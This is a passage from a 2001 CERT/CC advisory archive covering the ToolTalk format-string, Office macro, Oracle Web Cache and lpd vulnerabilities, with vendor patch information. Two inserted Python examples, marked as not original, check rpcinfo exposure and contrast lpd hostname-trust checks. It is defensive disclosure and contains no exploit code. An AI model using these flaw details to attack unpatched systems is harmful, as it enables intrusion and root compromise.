   CERT publications and other security information are available from our web site
     http://www.cert.org/
   To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message.

   * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________
NO WARRANTY

   Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________
   Conditions for use, disclaimers, and sponsorship information

   Copyright 2001 Carnegie Mellon University.
Revision History
   September 18, 2001: Initial Release

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBO6fYPgYcfu8gsZJZAQEG4QQAoblNKbAX/bVmJBdXy2Juf9OsMZeO2bR5
UW6hi7ddDkdUNBe52du2wU+n34tSjzA3c+0g9tYwKSXFeOp+m/CCLeYEXR+VTTel
RAmY1tOzDfMIDxD6+GrvfajYMz4pCGoSJgIdPGKxJm0Tnf6iv4akaYSAB4BPRw7A
FVp6JcCbatg=
=FizN
-----END PGP SIGNATURE-----

Date: Fri, 5 Oct 2001 14:56:06 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-27

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-27 Format String Vulnerability in CDE ToolTalk

   Original release date: October 5, 2001
   Last revised: Thu Oct 5 14:17:55 EDT 2001
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

   * Systems running CDE ToolTalk

Overview

   There is a remotely exploitable format string vulnerability in the CDE ToolTalk RPC database service. This vulnerability could be used to crash the service or execute arbitrary code, potentially allowing an intruder to gain root access. This vulnerability is documented in VU#595507.

I. Description

   The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on Unix and Linux operating systems. CDE ToolTalk is a message brokering system that provides an architecture for applications to communicate with each other across hosts and platforms. The ToolTalk RPC database server, rpc.ttdbserverd, manages communication between ToolTalk applications. For more information about CDE, see
     http://www.opengroup.org/cde/
     http://www.opengroup.org/desktop/faq/

   There is a remotely exploitable format string vulnerability in the CDE ToolTalk RPC database server. While handling an error condition, rpc.ttdbserverd calls syslog(3) without supplying a format string of its own: the data being logged is passed as the format argument itself (the pattern syslog(priority, buf) rather than syslog(priority, "%s", buf)). Since rpc.ttdbserverd does not perform adequate input validation on the request either, a crafted RPC request containing format string specifiers will be interpreted by the vulnerable syslog(3) call.
   Such a request can be designed to overwrite specific locations in memory, thus executing code with the privileges of rpc.ttdbserverd, typically root.

   The vulnerability was discovered by Internet Security Systems (ISS) X-Force. For more information, see
     http://xforce.iss.net/alerts/advise98.php

   This vulnerability has been assigned the identifier CAN-2001-0717 by the Common Vulnerabilities and Exposures (CVE) group:
     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0717

   Many common UNIX systems ship with CDE ToolTalk installed and enabled by default. The rpcinfo command may help determine if a system is running the ToolTalk RPC database service:

     $ rpcinfo -p hostname

   The program number for the ToolTalk RPC database service is 100083. References to this number in the output from rpcinfo or in /etc/rpc may indicate that the ToolTalk RPC database service is running. Any system that does not run the ToolTalk RPC database service is not vulnerable to this problem.

II. Impact

   An attacker can execute arbitrary code with the privileges of the rpc.ttdbserverd process, typically root.

III. Solution

Apply a patch

   Appendix A contains information from vendors who have provided information for this advisory. We will update the appendix as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly.

Block access to vulnerable service

   Until patches are available and can be applied, you may wish to block access to the RPC portmapper service and the ToolTalk RPC service from untrusted networks such as the Internet. Using a firewall or other packet-filtering technology, block the ports used by the RPC portmapper and ToolTalk RPC services. The RPC portmapper service typically runs on ports 111/tcp and 111/udp. The ToolTalk RPC service may be configured to use port 692/tcp or another port as indicated in output from the rpcinfo command.
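   As an added example, not part of the advisory, the following Python carries the rpcinfo check and the blocking advice above through: it parses the `rpcinfo -p` table, decides exposure on program number 100083 rather than on the service-name column (which is blank when /etc/rpc has no ttdbserverd entry), collects the portmapper and ToolTalk endpoints, and renders perimeter DROP rules scoped to the untrusted interface. The sample table is constructed for the demonstration (on it ToolTalk sits on a dynamically assigned port, not 692), the column layout matches Solaris/Linux rpcinfo but varies by platform, and iptables and the interface name eth0 are assumptions; use whatever packet filter sits at your perimeter.

```python
import re

# Constructed `rpcinfo -p` output (not captured from a real host).
SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100083    1   tcp  32771  ttdbserverd
    100083    1   udp  32771
    100021    1   udp   4045  nlockmgr
    100005    1   udp  32773  mountd
"""

PORTMAPPER = 100000
TOOLTALK_DB = 100083   # program number given in the advisory and in /etc/rpc

LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")


def parse_rpcinfo(text):
    """Parse `rpcinfo -p` output into a list of dicts. The service-name column
    is optional: it is frequently blank for 100083 and must not be relied on."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # header line or blank
        prog, vers, proto, port, name = m.groups()
        entries.append({"program": int(prog), "version": int(vers),
                        "proto": proto, "port": int(port), "name": name or ""})
    return entries


def tooltalk_exposed(entries):
    """True if the ToolTalk RPC database service is registered at all."""
    return any(e["program"] == TOOLTALK_DB for e in entries)


def ports_to_block(entries):
    """Sorted (proto, port) pairs for the portmapper and ToolTalk registrations.
    Blocking the portmapper alone is not enough: the ToolTalk port is reachable
    directly by anyone who already knows or guesses it."""
    return sorted({(e["proto"], e["port"]) for e in entries
                   if e["program"] in (PORTMAPPER, TOOLTALK_DB)})


def iptables_rules(entries, untrusted_iface="eth0"):
    """Render perimeter DROP rules for ports_to_block(). Scoped to the untrusted
    interface only: hosts on the internal network can still reach the service,
    which is why this is a stopgap rather than a fix. Interface name assumed."""
    return [f"iptables -A INPUT -i {untrusted_iface} -p {proto} --dport {port} -j DROP"
            for proto, port in ports_to_block(entries)]


if __name__ == "__main__":
    found = parse_rpcinfo(SAMPLE_RPCINFO)
    print("ToolTalk RPC database service registered:", tooltalk_exposed(found))
    for rule in iptables_rules(found):
        print(rule)
```

   On a live host replace SAMPLE_RPCINFO with the output of `rpcinfo -p` (via subprocess or a saved file); a registration for 100083 on any port is the condition the advisory tells you to look for, and a missing name column is not evidence of absence.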
   Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from the internal network. It is important to understand your network configuration and service requirements before deciding what changes are appropriate.

Appendix A. - Vendor Information

   This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Caldera, Inc.

   Caldera UnixWare and Open Linux are vulnerable, and a fix is forthcoming.

Compaq Computer Corporation

   Compaq Computer Corporation
   ============================
   Software Security Response Team

   Severity: low

   ToolTalk RPC Server Format String Vulnerability

   This potential security vulnerability has not been reproduced for any release of Compaq Tru64 Unix. However, with the information available, we are providing a patch that will further reduce any potential vulnerability.

   A patch has been made available for all supported versions of Tru64/DIGITAL UNIX V4.0f, V4.0g, V5.0a, V5.1, and V5.1a.

   *This solution will be included in a future distributed release of Compaq's Tru64/DIGITAL UNIX.

   This patch may be obtained from the following URL address:
     http://www.support.compaq.com/patches/
   Select BROWSE PATCH TREE and choose the version directory required.

   The patch names are:
     DUV40F17-C0056200-11703-ER-*.tar
     T64V40G17-C0007000-11704-ER-*.tar
     T64V50A17-C0015500-11705-ER-*.tar
     T64V5117-C0065200-11706-ER-*.tar
     T64V51Assb-C0000800-11707-ER-*.tar

   Note: The asterisk in the filename indicates the remainder of the tarfile name may change depending on the applicable date.

   This patch can be installed on:
     V4.0f, V4.0g all patch kits
     V5.0a, V5.1, and V5.1a all patch kits

Cray Inc.

   UNICOS and UNICOS/mk are not vulnerable to [this] advisory. For further information see Cray SPR 721061.
   Cray SPRs are available to licensed Cray customers.

Hewlett-Packard Company

   Patches are now available from HP. See HPSBUX0110-168 for details.

IBM Corporation

   IBM AIX 5.1 and 4.3 are vulnerable. IBM has released an emergency fix (efix) which contains patched binaries for both AIX 5.1 and AIX 4.3 as well as an advisory:
     ftp://aix.software.ibm.com/aix/efixes/security/tooltalk_efix.tar.Z

   IBM is working on APARs which will not be available until late October or November of 2001.
     AIX 4.3: Pending assignment
     AIX 5.1: APAR #IY23846

The Open Group

   The Open Group maintains source code for the Common Desktop Environment (CDE). Source licensees of The Open Group's CDE product can contact desktop@opengroup.org for advice and a source patch that addresses this issue.

SGI

   SGI acknowledges the CDE vulnerabilities reported by CERT and is currently investigating. No further information is available at this time.

   For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list.
     http://www.sgi.com/support/security/

Sun

   Sun has reproduced the vulnerability and is testing a fix. The Sun patches will be made available at the following location:
     http://sunsolve.sun.com/securitypatch/

Xi Graphics

   Xi Graphics is investigating this report and will provide more information when it is available.

Appendix B. - References

   1. http://www.opengroup.org/cde/
   2. http://www.opengroup.org/desktop/faq/
   3.
http://xforce.iss.net/alerts/advise98.php
   4. http://www.kb.cert.org/vuls/id/595507
   5. http://www.cert.org/advisories/CA-1998-11.html
_________________________________________________________________

   The CERT Coordination Center thanks Internet Security Systems (ISS) X-Force, who published an advisory on this issue. We would also like to thank The Open Group for technical assistance.
_________________________________________________________________
   Authors: Art Manion and Shawn V. Hernan
______________________________________________________________________
   This document is available from:
   http://www.cert.org/advisories/CA-2001-27.html
______________________________________________________________________
Revision History
   October 5, 2001: initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBO738iqCVPMXQI2HJAQHZFgP+Pr97BrhjEZKFE+MnpJMrGzy7fyWS9YTb
Q07LB4f/q7RWx/aaj09xh15G7OSrAIS32Nw5Ksdgr1AqObGDsEvkVb4rflb7VcuM
UJ+43zAAuv3uww/BR40itprqCw5aL8GomBvnUyVj/VDzGQHa26Vj8nILFo/dmASt
ouGA2RLQI/s=
=mdjA
-----END PGP SIGNATURE-----

Date: Mon, 8 Oct 2001 15:43:43 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-28

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-28 Automatic Execution of Macros

   Original release date: October 08, 2001
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

   Systems running:

   * Windows
     + Microsoft Excel 2000
     + Microsoft Excel 2002
     + Microsoft PowerPoint 2000
     + Microsoft PowerPoint 2002
   * Macintosh
     + Microsoft Excel 98
     + Microsoft Excel 2001
     + Microsoft PowerPoint 98
     + Microsoft PowerPoint 2001

Overview

   An intruder can include a specially crafted macro in a Microsoft Excel or PowerPoint document that can avoid detection and run automatically regardless of the security settings specified by the user.

I. Description

   Microsoft Excel and PowerPoint scan documents when they are opened and check for the existence of macros. If the document contains macros, the user running Excel or PowerPoint is alerted and asked whether the macros should be run. However, Microsoft Excel and PowerPoint may not detect malformed macros, so a user can unknowingly run macros containing malicious code when opening an Excel or PowerPoint document.
   An intruder who can entice or deceive a victim into opening a document using a vulnerable version of Excel or PowerPoint could take any action the victim could take, including, but not limited to

   * reading, deleting, or modifying data, either locally or on open file shares
   * modifying security settings (including macro virus protection settings)
   * sending electronic mail
   * posting data to or retrieving data from web sites

   For more information, please see
     http://securityresponse.symantec.com/avcenter/security/Content/2001.10.04.html
     http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-050.asp

   Given the strong potential for widespread abuse of this vulnerability, we strongly recommend that you apply patches as soon as you are able. The Melissa virus, which spread in March of 1999, shows what this class of attack can achieve: it used social engineering to convince victims to execute a macro embedded in a Microsoft Word document. For more information, see the CERT/CC advisory listed below.
     http://www.cert.org/advisories/CA-1999-04.html

   As a general practice, everyone should be aware of the potential damage that Trojan horses and other kinds of malicious code can cause to any platform. For more information, see
     http://www.cert.org/advisories/CA-1999-02.html

   This vulnerability has been assigned the identifier CAN-2001-0718 by the Common Vulnerabilities and Exposures (CVE) group:
     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0718

II. Impact

   An attacker can execute arbitrary code on the target system with the privileges of the victim running Excel or PowerPoint.

III. Solution

Apply a patch

   Appendix A contains information from vendors who have provided information for this advisory. We will update the appendix as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly.
   Until a patch can be applied, and as a general practice, we recommend using caution when opening attachments. In particular, the "From" line of an electronic mail message is not sufficient to authenticate the origin of a document: it is trivially forged, and a document from a familiar sender deserves the same caution as one from a stranger.

Appendix A. - Vendor Information

   This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Microsoft Corporation

   See Microsoft Security Bulletin MS01-050

Appendix B. - References

   1. http://securityresponse.symantec.com/avcenter/security/Content/2001.10.04.html
   2. http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-050.asp
   3. http://www.kb.cert.org/vuls/id/287067
   4. http://www.cert.org/advisories/CA-1999-04.html
   5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0718
_________________________________________________________________

   The CERT Coordination Center thanks Peter Ferrie and Symantec Security Response, who discovered this vulnerability and published the information in their advisory. Additionally, we thank Microsoft Corporation, who published an advisory on this issue.
_________________________________________________________________
   Authors: Ian A. Finlay and Shawn V. Hernan
______________________________________________________________________
   This document is available from:
   http://www.cert.org/advisories/CA-2001-28.html
______________________________________________________________________
Revision History
   October 8, 2001: initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBO8H+YKCVPMXQI2HJAQHlegP+P6LyxsV880PLmLoip+dUJs6LcMER+t7r
uNU4MABB66f7B8pLNUTHI4cSzTdkH2mYC/fzdro92Z1t5VNTlMAQ3V27WP03OrU6
BdbduoHCXVWZMHYe1otl8ePPwPDwdYvajlEUoXSeG97Jl3pbA5wcCCvBdnRvhREr
gSzpV7t53FU=
=B68T
-----END PGP SIGNATURE-----

Date: Thu, 25 Oct 2001 22:26:13 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-29 Oracle9iAS Web Cache vulnerable to buffer overflow

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-29 Oracle9iAS Web Cache vulnerable to buffer overflow

   Original release date: October 25, 2001
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

   Systems running:

   * Oracle9iAS Web Cache

Overview

   A remotely exploitable buffer overflow in the Oracle9iAS Web Cache allows intruders to execute arbitrary code or disrupt the normal operation of Web Cache.

I. Description

   Defcom Labs has discovered a remotely exploitable buffer overflow vulnerability in the Oracle9iAS Web Cache (on all platforms) that allows intruders to either execute arbitrary code with the privileges of the Web Cache process, or disrupt the normal operation of Web Cache.

   The Oracle9iAS Web Cache provides four web services that are all vulnerable and enabled by default when the software is installed. For more information about these web services, please see the Oracle9iAS Web Cache Administration and Deployment Guide (registration required). These services and the associated ports they listen on are listed below:

   * 1100/tcp (incoming web cache proxy)
   * 4000/tcp (administrative interface)
   * 4001/tcp (web XML invalidation port)
   * 4002/tcp (statistics port)

   Additional information regarding this vulnerability is available at
     http://otn.oracle.com/deploy/security/pdf/webcache.pdf
     http://www.securityfocus.com/archive/1/3BCEE434.F597D815@defcom.com

II.
Impact

   An intruder can execute arbitrary code with the privileges of the Web Cache process or disrupt the normal operation of Web Cache. Additionally, an intruder might be able to intercept and/or modify sensitive data such as credentials and other types of sensitive information passing through the host running Web Cache. Finally, an intruder may be able to gain access to other systems by using Web Cache as an entry point into the network or by leveraging an existing trust relationship between Web Cache and another system.

III. Solution

Install a patch from Oracle.

   More information is available in Appendix A.

Appendix A. - Vendor Information

   This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Oracle

   Please see
     http://otn.oracle.com/deploy/security/pdf/webcache.pdf

Appendix B. - References

   1. http://otn.oracle.com/deploy/security/pdf/webcache.pdf
   2. http://www.kb.cert.org/vuls/id/649979
   3. http://www.securityfocus.com/archive/1/3BCEE434.F597D815@defcom.com
_________________________________________________________________

   The CERT Coordination Center thanks Defcom Security, who discovered this vulnerability and published the information in their advisory. Additionally, we thank Oracle, who published an advisory on this issue.
_________________________________________________________________
   Author: Ian A. Finlay.
______________________________________________________________________
   This document is available from:
   http://www.cert.org/advisories/CA-2001-29.html
______________________________________________________________________
Revision History
   October 25, 2001: initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBO9jGraCVPMXQI2HJAQFVnQP/V53ZIsohPcXiF6pcvUl5zjpRccWtJRkl
StUdAbz9aiT7TcuhPcAtOkpOaWMPiDOFGR8Fu8MpVehS8VFEGzDJ0quKgf6LRRjx
8Ni5klqhORJ/+3Z/Pf0c+yHhMlDRV3SFPpnMLaPifBwXDmzgqJRTsL3dRb7fsigR
aljIl/lGOHY=
=yqti
-----END PGP SIGNATURE-----

Date: Mon, 5 Nov 2001 14:34:23 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-30 Multiple Vulnerabilities in lpd

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-30 Multiple Vulnerabilities in lpd

   Original release date: November 05, 2001
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

   * BSDi BSD/OS Version 4.1 and earlier
   * Debian GNU/Linux 2.1 and 2.1r4
   * FreeBSD All released versions FreeBSD 4.x, 3.x, FreeBSD 4.3-STABLE, 3.5.1-STABLE prior to the correction date
   * Hewlett-Packard HP9000 Series 700/800 running HP-UX releases 10.01, 10.10, 10.20, 11.00, and 11.11
   * IBM AIX Versions 4.3 and AIX 5.1
   * Mandrake Linux Versions 6.0, 6.1, 7.0, 7.1
   * NetBSD 1.5.2 and earlier
   * OpenBSD Version 2.9 and earlier
   * Red Hat Linux 6.0 all architectures
   * SCO OpenServer Version 5.0.6a and earlier
   * SGI IRIX 6.5-6.5.13
   * Sun Solaris 8 and earlier
   * SuSE Linux Versions 6.1, 6.2, 6.3, 6.4, 7.0, 7.1, 7.2

Overview

   There are multiple vulnerabilities in several implementations of the line printer daemon (lpd). The line printer daemon enables various clients to share printers over a network. Review your configuration to be sure you have applied all relevant patches. We also encourage you to restrict access to the lpd service to only authorized users.

I. Description

   There are multiple vulnerabilities in several implementations of the line printer daemon (lpd), affecting several systems. Some of these problems have been publicly disclosed previously. However, we believe many system and network administrators may have overlooked one or more of these vulnerabilities.
We are issuing this document primarily to encourage system and network administrators to check their systems for exposure to each of these vulnerabilities, even if they have addressed some lpd vulnerabilities recently. Most of these vulnerabilities are buffer overflows allowing a remote intruder to gain root access to the lpd server.

For the latest and most detailed information about the known vulnerabilities, please see the vulnerability notes linked to below.

VU#274043 - BSD line printer daemon buffer overflow in displayq()

There is a buffer overflow in several implementations of in.lpd, a BSD line printer daemon. An intruder can send a specially crafted print job to the target and then request a display of the print queue to trigger the buffer overflow. The intruder may be able to use this overflow to execute arbitrary commands on the system with superuser privileges.

The line printer daemon must be enabled and configured properly in order for an intruder to exploit this vulnerability. This is, however, trivial as the line printer daemon is commonly enabled to provide printing functionality. In order to exploit the buffer overflow, the intruder must launch his attack from a system that is listed in the "/etc/hosts.equiv" or "/etc/hosts.lpd" file of the target system.

VU#388183 - IBM AIX line printer daemon buffer overflow in kill_print()

A buffer overflow exists in the kill_print() function of the line printer daemon (lpd) on AIX systems. An intruder could exploit this vulnerability to obtain root privileges or cause a denial of service (DoS). The intruder would need to be listed in the victim's /etc/hosts.lpd or /etc/hosts.equiv file, however, to exploit this vulnerability.

VU#722143 - IBM AIX line printer daemon buffer overflow in send_status()

A buffer overflow exists in the send_status() function of the line printer daemon (lpd) on AIX systems. An intruder could exploit this vulnerability to obtain root privileges or cause a denial of service (DoS).
The intruder would need to be listed in the victim's /etc/hosts.lpd or /etc/hosts.equiv file, however, to exploit this vulnerability.

VU#466239 - IBM AIX line printer daemon buffer overflow in chk_fhost()

A buffer overflow exists in the chk_fhost() function of the line printer daemon (lpd) on AIX systems. An intruder could exploit this vulnerability to obtain root privileges or cause a denial of service (DoS). The intruder would need control of the DNS server to exploit this vulnerability.

VU#39001 - line printer daemon allows options to be passed to sendmail

There exists a vulnerability in the line printer daemon that permits an intruder to send options to sendmail. These options could be used to specify another configuration file allowing an intruder to gain root access.

VU#30308 - line printer daemon hostname authentication bypassed with spoofed DNS

A vulnerability exists in the line printer daemon (lpd) shipped with the printer package for several systems. The authentication method was not thorough enough. If a remote user was able to control their own DNS so that their IP address resolved to the hostname of the print server, access would be granted when it should not be.

VU#966075 - Hewlett-Packard HP-UX line printer daemon buffer overflow

A buffer overflow exists in HP-UX's line printer daemon (rlpdaemon) that may allow an intruder to execute arbitrary code with superuser privilege on the target system. The rlpdaemon is installed by default and is active even if it is not being used. An intruder does not need any prior knowledge, or privileges on the target system, in order to exploit this vulnerability.

II. Impact

All of these vulnerabilities can be exploited remotely. In most cases, they allow an intruder to execute arbitrary code with the privileges of the lpd server. In some cases, an intruder must have access to a machine listed in /etc/hosts.equiv or /etc/hosts.lpd, and in some cases, an intruder must be able to control a nameserver.
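The hostname check behind VU#30308 and the /etc/hosts.lpd trust model, as an added example that is not part of the advisory or any vendor's lpd code: the weak pattern that trusts a reverse lookup alone, beside a forward-confirmed check. The DNS records and the hosts.lpd contents are constructed, and the two lookup functions stand in for gethostbyaddr()/gethostbyname() so the code runs offline.

```python
"""Hostname-based access control of the kind lpd applies via /etc/hosts.lpd
and /etc/hosts.equiv.  Added example, not CERT or vendor code; all DNS data
and file contents below are constructed."""
from typing import Dict, List, Optional

# Constructed DNS data.  10.0.0.5 is a legitimate print client.  203.0.113.9
# is an unrelated host whose operator controls the reverse zone for that
# address and has pointed its PTR record at the print server's own name, the
# situation VU#30308 describes.  The forward zone for example.com is not
# under that operator's control, so the name still resolves elsewhere.
REVERSE: Dict[str, str] = {
    "10.0.0.5": "client1.example.com",
    "203.0.113.9": "printsrv.example.com",
}
FORWARD: Dict[str, List[str]] = {
    "printsrv.example.com": ["192.0.2.10"],
    "client1.example.com": ["10.0.0.5"],
}

# Constructed /etc/hosts.lpd: one trusted hostname per line, '#' comments.
HOSTS_LPD = """\
# hosts allowed to submit print jobs
printsrv.example.com
client1.example.com
"""


def parse_hosts_lpd(text: str) -> List[str]:
    """Return the hostnames listed in a hosts.lpd-style file (lower-cased)."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            names.append(line.lower())
    return names


def reverse_lookup(ip: str) -> Optional[str]:
    """Stand-in for gethostbyaddr(): IP -> hostname from the PTR record."""
    return REVERSE.get(ip)


def forward_lookup(name: str) -> List[str]:
    """Stand-in for gethostbyname(): hostname -> A-record addresses."""
    return FORWARD.get(name, [])


def allowed_reverse_only(client_ip: str, trusted: List[str]) -> bool:
    """The weak pattern: whatever name the PTR record yields is compared
    against the trusted list, so whoever controls the reverse zone for the
    connecting address decides which name is presented."""
    name = reverse_lookup(client_ip)
    return name is not None and name.lower() in trusted


def allowed_forward_confirmed(client_ip: str, trusted: List[str]) -> bool:
    """Hardened pattern: the PTR name must be trusted AND must forward-resolve
    back to the connecting address (forward-confirmed reverse DNS)."""
    name = reverse_lookup(client_ip)
    if name is None or name.lower() not in trusted:
        return False
    return client_ip in forward_lookup(name)
```

Forward confirmation closes the reverse-zone-only spoof but still relies on the forward zone for the listed names being authoritative, which is why the advisory also recommends patching and restricting port 515/TCP rather than relying on hostname checks.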
One vulnerability (VU#39001) allows you to specify options to sendmail that can be used to execute arbitrary commands. Ordinarily, this vulnerability is only exploitable from machines that are authorized to use the lpd server. However, in conjunction with another vulnerability (VU#30308), permitting intruders to gain access to the lpd service, this vulnerability can be used by intruders not normally authorized to use the lpd service.

For specific information about the impacts of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls).

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly.

This table represents the status of each vendor with regard to each vulnerability. Please be aware that vendors produce multiple products; if they are listed in this table, not all products may be affected. If a vendor is not listed in the table below, then their status should be considered unknown. For specific information about the status of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls).

  + = Affected
  - = Not Affected
  ? = Unknown

  VU# ->   |274043 |388183 |722143 |466239 |39001  |30308  |966075
  Vendors  |-------|-------|-------|-------|-------|-------|-------
  Apple    |   -   |   ?   |   ?   |   ?   |   ?   |   ?   |   -
  BSDI     |   +   |   ?   |   ?   |   ?   |   ?   |   ?   |   ?
  Caldera  |   -   |   -   |   -   |   -   |   -   |   -   |   -
  Cray     |   ?   |   -   |   -   |   -   |   -   |   ?   |   -
  Debian   |   ?   |   ?   |   ?   |   ?   |   +   |   +   |   ?
  Engarde  |   -   |   -   |   -   |   -   |   -   |   -   |   -
  FreeBSD  |   +   |   -   |   -   |   -   |   -   |   -   |   -
  Fujitsu  |   -   |   -   |   -   |   -   |   -   |   -   |   -
  HP       |   ?   |   ?   |   ?   |   ?   |   ?   |   ?   |   +
  IBM      |   -   |   +   |   +   |   +   |   -   |   +   |   -
  Mandrake |   ?   |   ?   |   ?   |   ?   |   +   |   ?   |   ?
  NetBSD   |   +   |   ?   |   ?   |   ?   |   ?   |   ?   |   ?
  OpenBSD  |   +   |   ?   |   ?   |   ?   |   ?   |   ?   |   ?
  Red Hat  |   ?   |   ?   |   ?   |   ?   |   +   |   +   |   ?
  SCO      |   +   |   ?   |   ?   |   ?   |   ?   |   ?   |   ?
  SGI      |   +   |   ?   |   ?   |   ?   |   ?   |   ?   |   ?
  SuSE     |   +   |   ?   |   ?   |   ?   |   ?   |   ?   |   ?
  Sun      |   -   |   -   |   -   |   -   |   +   |   -   |   -

Restrict access to the lpd service

As a general practice, we recommend disabling all services that are not explicitly required. You may wish to disable the line printer daemon if there is not a patch available from your vendor. If you cannot disable the service, you can limit your exposure to these vulnerabilities by using a router or firewall to restrict access to port 515/TCP (printer). Note that this does not protect you against attackers from within your network.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple Computer, Inc.

Mac OS X does not have the line printer daemon vulnerability issues described in these advisories.

Berkeley Software Design, Inc. (BSDI)

Some (older) versions are affected. The current (BSD/OS 4.2) release is not vulnerable. Systems are only vulnerable to attack from hosts which are allowed via the /etc/hosts.lpd file (which is empty as shipped). BSD/OS 4.1 is the only vulnerable version which is still officially supported by Wind River Systems. A patch (M410-044) is available in the normal locations, ftp://ftp.bsdi.com/bsdi/patches or via our web site at http://www.bsdi.com/support

Compaq

Compaq has not been able to reproduce the problems identified in this advisory for TRU64 UNIX. We will continue testing and address the LPD issues if a problem is discovered and provide patches as necessary.

Cray

Cray, Inc. has been unable to prove an lpd vulnerability. However, it was deemed that a buffer overflow may be possible and so did tighten up the code.
See Cray SPR 721101 for more details.

Debian

http://www.debian.org/security/2000/20000109

FreeBSD, Inc.

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01%3A58.lpd.asc

Hewlett-Packard Company

Hewlett-Packard has released HPSBUX0108-163 Sec. Vulnerability in rlpdaemon Bulletin and patches available from http://itrc.hp.com

Details to access http://itrc.hp.com are included in the last half of any HP Bulletin.

IBM Corporation

http://www-1.ibm.com/services/continuity/recover1.nsf/4699c03b46f2d4f68525678c006d45ae/85256a3400529a8685256ac7005cf00a/$FILE/oar391.txt

Mandrake Software

http://www.linux-mandrake.com/en/updates/2000/MDKSA-2000-054.php3

NetBSD

If lpd has been enabled, this issue affects NetBSD versions 1.5.2 and prior releases, and NetBSD-current prior to August 30, 2001. lpd is disabled by default in NetBSD installations. Detailed information will be released subsequent to the publication of this CERT advisory. An up-to-date PGP signed copy of the release will be maintained at ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-018.txt.asc

Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG and http://www.NetBSD.ORG/Security/.

OpenBSD

http://www.openbsd.org/errata29.html#lpd

RedHat Inc.

http://www.redhat.com/support/errata/RHSA2000002-01.6.0.html

Santa Cruz Operation, Inc. (SCO)

ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.20/

SGI

ftp://patches.sgi.com/support/free/security/advisories/20011003-01-P

SuSE

http://lists2.suse.com/archive/suse-security-announce/2001-Oct/0000.html

_________________________________________________________________

The CERT Coordination Center thanks Internet Security Systems and IBM for the information provided in their advisories.

_________________________________________________________________

Feedback on this document can be directed to the author, Jason A. Rafail

_________________________________________________________________

References

* http://www.kb.cert.org/vuls/id/274043
